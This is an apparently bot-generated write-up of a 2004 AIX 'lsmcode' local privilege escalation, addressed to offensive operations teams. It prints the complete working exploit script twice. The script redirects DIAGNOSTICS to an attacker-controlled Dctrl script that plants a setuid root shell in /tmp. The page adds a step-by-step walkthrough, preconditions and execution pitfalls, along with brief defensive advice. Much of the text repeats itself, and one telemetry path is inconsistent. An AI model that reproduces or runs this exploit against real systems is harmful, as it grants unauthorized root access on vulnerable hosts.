By exploitdb papers bot•December 21, 2004•

papers

AIX 'lsmcode' Privilege Escalation: A Deep Dive for Offensive Teams

What this paper is

This paper details a local privilege escalation vulnerability in AIX operating systems, specifically affecting versions 4.3 and 5.1, and prior to 5.3. The vulnerability allows a local user to gain root privileges by exploiting the lsmcode command.

Simple technical breakdown

The core of the exploit lies in how the lsmcode command handles its configuration files. When lsmcode is executed, it looks for a specific directory structure and executable script to perform certain diagnostic actions. The vulnerability arises because lsmcode can be tricked into executing an arbitrary script that the attacker controls, which then sets up a setuid root shell.

Complete code and payload walkthrough

The provided exploit code is a shell script that sets up the necessary environment and then executes the vulnerable command.

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

Let's break down each part:

mkdirhier /tmp/aap/bin: This command creates the directory /tmp/aap/bin and any necessary parent directories if they don't already exist. This is where the attacker will place their malicious script.
- Practical Purpose: Establishes the required directory structure for the exploit.
export DIAGNOSTICS=/tmp/aap: This sets the DIAGNOSTICS environment variable to point to /tmp/aap. The lsmcode command is designed to look for diagnostic tools and configurations within the directory specified by this variable.
- Practical Purpose: Directs lsmcode to look for its configuration in the attacker-controlled directory.
cat > /tmp/aap/bin/Dctrl << EOF ... EOF: This block creates a new file named Dctrl inside the /tmp/aap/bin directory. The content of this file is a shell script.
- #!/bin/sh: This is the shebang line, indicating that the script should be executed with /bin/sh.
- cp /bin/sh /tmp/.shh: This command copies the standard shell (/bin/sh) to a new file named .shh in the /tmp directory.
- chown root:system /tmp/.shh: This changes the owner of the copied shell to root and the group to system.
- chmod u+s /tmp/.shh: This sets the setuid bit on the copied shell. This is the crucial step. When a setuid executable is run, it executes with the privileges of the file's owner (in this case, root), not the user who ran it.
- Practical Purpose: Creates a malicious script that, when executed by lsmcode, will create a setuid root shell.
chmod a+x /tmp/aap/bin/Dctrl: This makes the Dctrl script executable by all users (owner, group, and others).
- Practical Purpose: Ensures the Dctrl script can be executed.
lsmcode: This is the vulnerable command. When executed, and with the DIAGNOSTICS environment variable set, lsmcode will attempt to execute scripts found in the bin subdirectory of the DIAGNOSTICS path. In this case, it will find and execute /tmp/aap/bin/Dctrl.
- Practical Purpose: Triggers the vulnerability by executing the attacker-controlled script.
/tmp/.shh: After lsmcode finishes (or potentially during its execution, depending on the exact lsmcode behavior and the script's timing), this command executes the newly created setuid root shell. Because /tmp/.shh has the setuid bit set and is owned by root, running it will spawn a new shell with root privileges.
- Practical Purpose: Executes the setuid root shell, granting the attacker root access.

Mapping list:

mkdirhier /tmp/aap/bin: Directory setup for exploit staging.
export DIAGNOSTICS=/tmp/aap: Environment variable manipulation to redirect lsmcode.
cat > /tmp/aap/bin/Dctrl << EOF ... EOF: Creation of the malicious script (Dctrl).
- cp /bin/sh /tmp/.shh: Copying the target shell.
- chown root:system /tmp/.shh: Setting ownership to root.
- chmod u+s /tmp/.shh: Setting the setuid bit for privilege escalation.
chmod a+x /tmp/aap/bin/Dctrl: Making the malicious script executable.
lsmcode: Triggering the vulnerable command.
/tmp/.shh: Executing the setuid root shell.

Practical details for offensive operations teams

Required Access Level: Local user access to the target AIX system. No special privileges are needed initially, as the goal is privilege escalation.
Lab Preconditions:
- A target AIX system running a vulnerable version (4.3, 5.1, or prior to 5.3).
- The lsmcode command must be present and executable by the local user.
- The /tmp directory must be writable and executable by the local user.
- The /bin/sh executable must exist and be accessible.
- The cp, chown, chmod, mkdirhier, export, cat, and sh commands must be available.
Tooling Assumptions: Standard AIX command-line utilities are sufficient. No specialized exploit frameworks are strictly required for this specific exploit, though they could be used to deliver and execute the script.
Execution Pitfalls:
- Version Mismatch: The exploit will not work on AIX versions 5.3 and later, as the vulnerability was patched. Verifying the AIX version is critical.
- Permissions: If /tmp is mounted with noexec or nosuid options, the exploit will fail. If the attacker cannot write to /tmp, an alternative writable location would be needed, but this is less common.
- lsmcode Path: If lsmcode is not in the system's PATH or is not executable by the user, the exploit will fail.
- Script Execution Order: While the script is sequential, subtle timing issues or system load could theoretically interfere, though unlikely for this straightforward sequence.
- Antivirus/Intrusion Detection: While less common for local exploits in 2004, modern systems might detect the creation of a setuid root shell or the suspicious script execution.
Telemetry:
- Creation of /tmp/aap and /tmp/aap/bin directories.
- Creation of /tmp/aap/bin/Dctrl file.
- Execution of lsmcode.
- Execution of /tmp/shh.
- Creation of /tmp/.shh file.
- Changes to file ownership and permissions for /tmp/.shh.
- A new shell process spawned with UID 0 (root).

Where this was used and when

This exploit was published in December 2004. At that time, AIX was a prevalent operating system in enterprise environments, particularly for servers and mission-critical applications. Exploits like this would have been relevant for attackers targeting organizations using these systems to gain deeper access and control. It's difficult to pinpoint specific real-world incidents without further reporting, but it represents a common class of local privilege escalation vulnerabilities found in the early to mid-2000s.

Defensive lessons for modern teams

Patch Management: The most direct defense is to keep operating systems updated. AIX 5.3 and later are not vulnerable.
Principle of Least Privilege: Users should not have unnecessary permissions. If a user doesn't need to execute lsmcode or write to /tmp, their privileges should be restricted.
Filesystem Mount Options: Mounting /tmp with noexec and nosuid can mitigate many local privilege escalation exploits that rely on executing binaries or setuid programs from temporary directories.
Auditing and Monitoring: Log and alert on suspicious file creations, permission changes, and the execution of unexpected binaries, especially those with the setuid bit set. Monitoring for the execution of lsmcode in conjunction with environment variable changes could be an indicator.
Vulnerability Scanning: Regularly scan systems for known vulnerabilities, including older ones that might still be present on unpatched systems.

ASCII visual (if applicable)

This exploit doesn't lend itself to a complex architectural diagram. It's a direct manipulation of a command's behavior through environment variables and file system manipulation.

+-------------------+     +----------------------+     +-----------------+
| Attacker (Local)  | --> | AIX System (Vulnerable)| --> | Root Privileges |
+-------------------+     +----------------------+     +-----------------+
      |                         |
      | 1. Create dirs & script |
      |   (/tmp/aap/bin/Dctrl) |
      |   (setsuid /tmp/.shh) |
      |                         |
      | 2. Set DIAGNOSTICS env  |
      |                         |
      | 3. Execute `lsmcode`    |
      |   (runs Dctrl)          |
      |                         |
      | 4. Execute `/tmp/.shh`  |
      |   (now root shell)      |
      v                         v

Source references

PAPER ID: 701
PAPER TITLE: AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation
AUTHOR: cees-bart
PUBLISHED: 2004-12-21
KEYWORDS: AIX,local
PAPER URL: https://www.exploit-db.com/papers/701
RAW URL: https://www.exploit-db.com/raw/701

Original Exploit-DB Content (Verbatim)

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

# milw0rm.com [2004-12-21]

Simple technical breakdown

Complete code and payload walkthrough

The provided exploit code is a shell script that sets up the necessary environment and then executes the vulnerable command.

mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat > /tmp/aap/bin/Dctrl << EOF #!/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh

Let's break down each part:

mkdirhier /tmp/aap/bin: This command creates the directory /tmp/aap/bin and any necessary parent directories if they don't already exist. This is where the attacker will place their malicious script.

Practical Purpose: Establishes the required directory structure for the exploit.

export DIAGNOSTICS=/tmp/aap: This sets the DIAGNOSTICS environment variable to point to /tmp/aap. The lsmcode command is designed to look for diagnostic tools and configurations within the directory specified by this variable.

Practical Purpose: Directs lsmcode to look for its configuration in the attacker-controlled directory.

cat > /tmp/aap/bin/Dctrl << EOF ... EOF: This block creates a new file named Dctrl inside the /tmp/aap/bin directory. The content of this file is a shell script.

#!/bin/sh: This is the shebang line, indicating that the script should be executed with /bin/sh.
cp /bin/sh /tmp/.shh: This command copies the standard shell (/bin/sh) to a new file named .shh in the /tmp directory.
chown root:system /tmp/.shh: This changes the owner of the copied shell to root and the group to system.
chmod u+s /tmp/.shh: This sets the setuid bit on the copied shell. This is the crucial step. When a setuid executable is run, it executes with the privileges of the file's owner (in this case, root), not the user who ran it.
Practical Purpose: Creates a malicious script that, when executed by lsmcode, will create a setuid root shell.

chmod a+x /tmp/aap/bin/Dctrl: This makes the Dctrl script executable by all users (owner, group, and others).

Practical Purpose: Ensures the Dctrl script can be executed.

lsmcode: This is the vulnerable command. When executed, and with the DIAGNOSTICS environment variable set, lsmcode will attempt to execute scripts found in the bin subdirectory of the DIAGNOSTICS path. In this case, it will find and execute /tmp/aap/bin/Dctrl.

Practical Purpose: Triggers the vulnerability by executing the attacker-controlled script.

/tmp/.shh: After lsmcode finishes (or potentially during its execution, depending on the exact lsmcode behavior and the script's timing), this command executes the newly created setuid root shell. Because /tmp/.shh has the setuid bit set and is owned by root, running it will spawn a new shell with root privileges.

Practical Purpose: Executes the setuid root shell, granting the attacker root access.

Mapping list:

mkdirhier /tmp/aap/bin: Directory setup for exploit staging.

export DIAGNOSTICS=/tmp/aap: Environment variable manipulation to redirect lsmcode.

cat > /tmp/aap/bin/Dctrl << EOF ... EOF: Creation of the malicious script (Dctrl).

cp /bin/sh /tmp/.shh: Copying the target shell.
chown root:system /tmp/.shh: Setting ownership to root.
chmod u+s /tmp/.shh: Setting the setuid bit for privilege escalation.

chmod a+x /tmp/aap/bin/Dctrl: Making the malicious script executable.

lsmcode: Triggering the vulnerable command.

/tmp/.shh: Executing the setuid root shell.

Practical details for offensive operations teams

Required Access Level: Local user access to the target AIX system. No special privileges are needed initially, as the goal is privilege escalation.

Lab Preconditions:

A target AIX system running a vulnerable version (4.3, 5.1, or prior to 5.3).
The lsmcode command must be present and executable by the local user.
The /tmp directory must be writable and executable by the local user.
The /bin/sh executable must exist and be accessible.
The cp, chown, chmod, mkdirhier, export, cat, and sh commands must be available.

Tooling Assumptions: Standard AIX command-line utilities are sufficient. No specialized exploit frameworks are strictly required for this specific exploit, though they could be used to deliver and execute the script.

Execution Pitfalls:

Version Mismatch: The exploit will not work on AIX versions 5.3 and later, as the vulnerability was patched. Verifying the AIX version is critical.
Permissions: If /tmp is mounted with noexec or nosuid options, the exploit will fail. If the attacker cannot write to /tmp, an alternative writable location would be needed, but this is less common.
lsmcode Path: If lsmcode is not in the system's PATH or is not executable by the user, the exploit will fail.
Script Execution Order: While the script is sequential, subtle timing issues or system load could theoretically interfere, though unlikely for this straightforward sequence.
Antivirus/Intrusion Detection: While less common for local exploits in 2004, modern systems might detect the creation of a setuid root shell or the suspicious script execution.

Telemetry:

Creation of /tmp/aap and /tmp/aap/bin directories.
Creation of /tmp/aap/bin/Dctrl file.
Execution of lsmcode.
Execution of /tmp/shh.
Creation of /tmp/.shh file.
Changes to file ownership and permissions for /tmp/.shh.
A new shell process spawned with UID 0 (root).

Where this was used and when

Defensive lessons for modern teams

Patch Management: The most direct defense is to keep operating systems updated. AIX 5.3 and later are not vulnerable.

Principle of Least Privilege: Users should not have unnecessary permissions. If a user doesn't need to execute lsmcode or write to /tmp, their privileges should be restricted.

Filesystem Mount Options: Mounting /tmp with noexec and nosuid can mitigate many local privilege escalation exploits that rely on executing binaries or setuid programs from temporary directories.

Auditing and Monitoring: Log and alert on suspicious file creations, permission changes, and the execution of unexpected binaries, especially those with the setuid bit set. Monitoring for the execution of lsmcode in conjunction with environment variable changes could be an indicator.

Vulnerability Scanning: Regularly scan systems for known vulnerabilities, including older ones that might still be present on unpatched systems.

ASCII visual (if applicable)

This exploit doesn't lend itself to a complex architectural diagram. It's a direct manipulation of a command's behavior through environment variables and file system manipulation.